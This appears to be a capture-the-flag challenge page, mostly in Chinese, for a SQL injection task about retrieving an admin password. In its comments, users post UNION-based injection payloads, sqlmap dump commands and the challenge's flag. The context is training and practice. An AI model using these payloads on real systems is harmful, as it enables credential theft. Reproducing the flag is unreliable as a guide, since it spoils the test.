Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
447
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
nickhu 攻破了该题 1天前
Q-Larry 攻破了该题 1天前
HamiLemon 攻破了该题 11天前
tom0528 攻破了该题 12天前
tenwool 攻破了该题 14天前
bant 攻破了该题 14天前
lalala2022 攻破了该题 16天前
lola 攻破了该题 18天前
pigpigG6768 攻破了该题 22天前
hsk_zy 攻破了该题 25天前
xyjwkg 攻破了该题 26天前
249190331 攻破了该题 29天前
kaito. 攻破了该题 1月前
xingzou 攻破了该题 1月前
wujita01 攻破了该题 1月前
sakuye 攻破了该题 1月前
tdyyyyyy 攻破了该题 1月前
kailiyizhong 攻破了该题 1月前
甘糖 攻破了该题 1月前
评论
tenwool 14天前
举报
这个判断逻辑是只要查密码就出flag,所以最简单的就是union select 1,2,3,password from users --+直接就出来了
tenwool 14天前
举报
搞了半天没做出来,原来提示里全都给了. order by 查出4列 union select 1,2,3,4 发现第二列不回显,提示又让找密码,直接 union select (select password from users where username='admin'),2,3,4 --+,出flag
tdwj 8月前
举报
一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag
欧尼酱001 1年前
举报
1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}
WCRH 1年前
举报
这又不是post请求,你还保存上txt了
.⎛⎝•̀ω•́⎠⎞. 2年前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 2年前
举报
union查询
xiaobai568 2年前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 2年前
举报
sqlmap即可
chaoge 2年前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 2年前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+